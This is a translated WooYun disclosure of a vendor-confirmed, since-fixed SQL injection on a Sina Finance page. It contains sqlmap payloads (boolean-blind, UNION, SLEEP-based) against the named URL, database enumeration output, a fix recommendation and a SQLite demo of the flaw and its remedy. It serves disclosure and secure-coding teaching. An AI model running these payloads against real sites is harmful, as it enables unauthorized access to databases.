Vulnerability summary
Defect ID: wooyun-2013-039774
Title: A SQL injection vulnerability in Sina Finance (新浪财经)
Vendor: Sina (新浪)
Author: 霍大然
Submitted: 2013-10-15 11:02
Fixed: 2013-11-29 11:03
Published: 2013-11-29 11:03
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 11
Status: confirmed by vendor
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2013-10-15: Details sent to the vendor, awaiting vendor action
2013-10-15: Vendor has confirmed; details disclosed to the vendor only
2013-10-25: Details disclosed to core white hats and domain experts
2013-11-04: Details disclosed to regular white hats
2013-11-14: Details disclosed to intern white hats
2013-11-29: Details disclosed to the public
Brief description:
A SQL injection vulnerability in Sina Finance
Details:
Injection point (the stk_id GET parameter; sqlmap output follows):
http://biz.finance.sina.com.cn/stkrcmd/stkrcmd_people.php?stk_id=sh600981 (GET)
Place: GET
Parameter: stk_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: stk_id=sh600981' AND 5502=5502 AND 'oTFg'='oTFg
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: stk_id=sh600981' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e747071,0x4f434a4f5248524f7a70,0x716a667471),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: stk_id=sh600981' AND SLEEP(5) AND 'VpRa'='VpRa
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] biz
[*] information_schema
[*] test
back-end DBMS: MySQL 5.0.11
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: information_schema
Table: USER_PRIVILEGES
[4 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| GRANTEE | varchar(81) |
| IS_GRANTABLE | varchar(3) |
| PRIVILEGE_TYPE | varchar(64) |
| TABLE_CATALOG | varchar(512) |
+----------------+--------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: information_schema
Table: TABLES
[21 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| VERSION | bigint(21) |
| AUTO_INCREMENT | bigint(21) |
| AVG_ROW_LENGTH | bigint(21) |
| CHECK_TIME | datetime |
| CHECKSUM | bigint(21) |
| CREATE_OPTIONS | varchar(255) |
| CREATE_TIME | datetime |
| DATA_FREE | bigint(21) |
| DATA_LENGTH | bigint(21) |
| ENGINE | varchar(64) |
| INDEX_LENGTH | bigint(21) |
| MAX_DATA_LENGTH | bigint(21) |
| ROW_FORMAT | varchar(10) |
| TABLE_CATALOG | varchar(512) |
| TABLE_COLLATION | varchar(64) |
| TABLE_COMMENT | varchar(80) |
| TABLE_NAME | varchar(64) |
| TABLE_ROWS | bigint(21) |
| TABLE_SCHEMA | varchar(64) |
| TABLE_TYPE | varchar(64) |
| UPDATE_TIME | datetime |
+-----------------+--------------+
Proof of vulnerability:
Fix recommendation:
Validate stk_id on the server against the expected ticker format (the report's example is sh600981: an exchange prefix followed by six digits) and bind it as a parameter of a prepared statement instead of concatenating it into the SQL string. Filtering characters alone is not a reliable fix; the UNION payload above already carries its string via MySQL 0x hex literals, so it needs no quote of its own once the first quote has closed the literal.
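As an added example (not part of the original report and not Sina's code), the following Python script reproduces against an in-memory SQLite table the behaviour the sqlmap findings above describe: a lookup that pastes stk_id into the SQL text, the report's boolean-based and UNION payloads run against it, and the fixed lookup with allow-list validation plus parameter binding. The table name, columns and rows are constructed for the demo; the real schema is not in the report. The UNION payload is adapted from MySQL (CONCAT(0x..) and the # comment) to SQLite (|| and --), and SQLite has no SLEEP(), so the time-based payload is not reproduced. The hex literals in the report's UNION payload are decoded to show they are sqlmap's marker strings wrapped around a random token, not application data.

```python
import re
import sqlite3

# Constructed sample data standing in for the stkrcmd page's table; the real
# schema is not in the report. Five columns, matching the five slots of the
# report's UNION payload (NULL,NULL,NULL,CONCAT(...),NULL).
ROWS = [
    ("sh600981", "analyst_a", 1, "buy", "2013-10"),
    ("sh600000", "analyst_b", 2, "hold", "2013-10"),
    ("sz000001", "analyst_c", 3, "sell", "2013-09"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE stkrcmd (stk_id TEXT, author TEXT, rank INTEGER, "
        "advice TEXT, period TEXT)"
    )
    conn.executemany("INSERT INTO stkrcmd VALUES (?, ?, ?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, stk_id):
    # The pattern the sqlmap findings imply: the GET parameter is pasted into
    # the SQL text, so a quote in it ends the literal and the rest is parsed
    # as SQL.
    sql = "SELECT * FROM stkrcmd WHERE stk_id = '%s'" % stk_id
    return conn.execute(sql).fetchall()


def lookup_bound_only(conn, stk_id):
    # Parameter binding alone already defeats the injection: the payload is
    # compared as one opaque string and matches no row.
    return conn.execute(
        "SELECT * FROM stkrcmd WHERE stk_id = ?", (stk_id,)
    ).fetchall()


# Allow-list for the ticker format seen in the report (sh600981): an exchange
# prefix and six digits. Assumed format for the demo.
STK_ID_RE = re.compile(r"(sh|sz)\d{6}")


def lookup_fixed(conn, stk_id):
    # Defence in depth: reject anything that is not shaped like a ticker
    # before it reaches the database, then bind the value as a parameter.
    if not STK_ID_RE.fullmatch(stk_id):
        raise ValueError("invalid stk_id: %r" % stk_id)
    return lookup_bound_only(conn, stk_id)


def decode_mysql_hex(literal):
    # MySQL 0x... literals are raw bytes; sqlmap uses them to carry its
    # marker strings without needing quote characters in the payload.
    return bytes.fromhex(literal[2:]).decode("ascii")


# The report's payloads. Boolean-blind: the same query with a true and a
# false condition; the difference in the response is the oracle. The false
# variant is constructed here (sqlmap sends one too, with another number).
PAYLOAD_TRUE = "sh600981' AND 5502=5502 AND 'oTFg'='oTFg"
PAYLOAD_FALSE = "sh600981' AND 5502=5503 AND 'oTFg'='oTFg"

# UNION: CONCAT(0x716e747071,0x4f434a4f5248524f7a70,0x716a667471) and the
# trailing '#' from the report, rewritten for SQLite as || and --.
MARKERS = tuple(
    decode_mysql_hex(h)
    for h in ("0x716e747071", "0x4f434a4f5248524f7a70", "0x716a667471")
)
PAYLOAD_UNION = (
    "sh600981' UNION ALL SELECT NULL,NULL,NULL,'%s'||'%s'||'%s',NULL--"
    % MARKERS
)


def demo():
    conn = make_db()
    union = lookup_vulnerable(conn, PAYLOAD_UNION)
    # The injected row has NULL in stk_id; its fourth column carries the
    # marker-wrapped token that sqlmap searches for in the HTML response.
    marker = next(row[3] for row in union if row[0] is None)
    try:
        lookup_fixed(conn, PAYLOAD_UNION)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "boolean_true": len(lookup_vulnerable(conn, PAYLOAD_TRUE)),
        "boolean_false": len(lookup_vulnerable(conn, PAYLOAD_FALSE)),
        "union_rows": len(union),
        "union_marker": marker,
        "bound_only": len(lookup_bound_only(conn, PAYLOAD_TRUE)),
        "fixed_valid": len(lookup_fixed(conn, "sh600981")),
        "fixed_rejected": rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-15s %r" % (key, value))
```

Running demo() shows the true and false boolean payloads returning one row and zero rows (the blind oracle), the UNION payload adding a row whose fourth column is the decoded marker string qntpqOCJORHROzpqjftq, the bound-only lookup returning nothing for the same payload, and the fixed lookup rejecting it before any query runs. The sqlmap banner's "MySQL 5.0.11" comes from the time-based technique that succeeded (SLEEP() exists only in MySQL 5.0.12 and later), so read it as a lower bound on the version rather than an exact fingerprint.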
Copyright notice: please credit 霍大然@乌云 (WooYun) when reproducing.
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2013-10-15 11:24
Vendor reply:
Thank you for your attention to Sina security; we will assign the relevant staff to fix it immediately.
Latest status:
None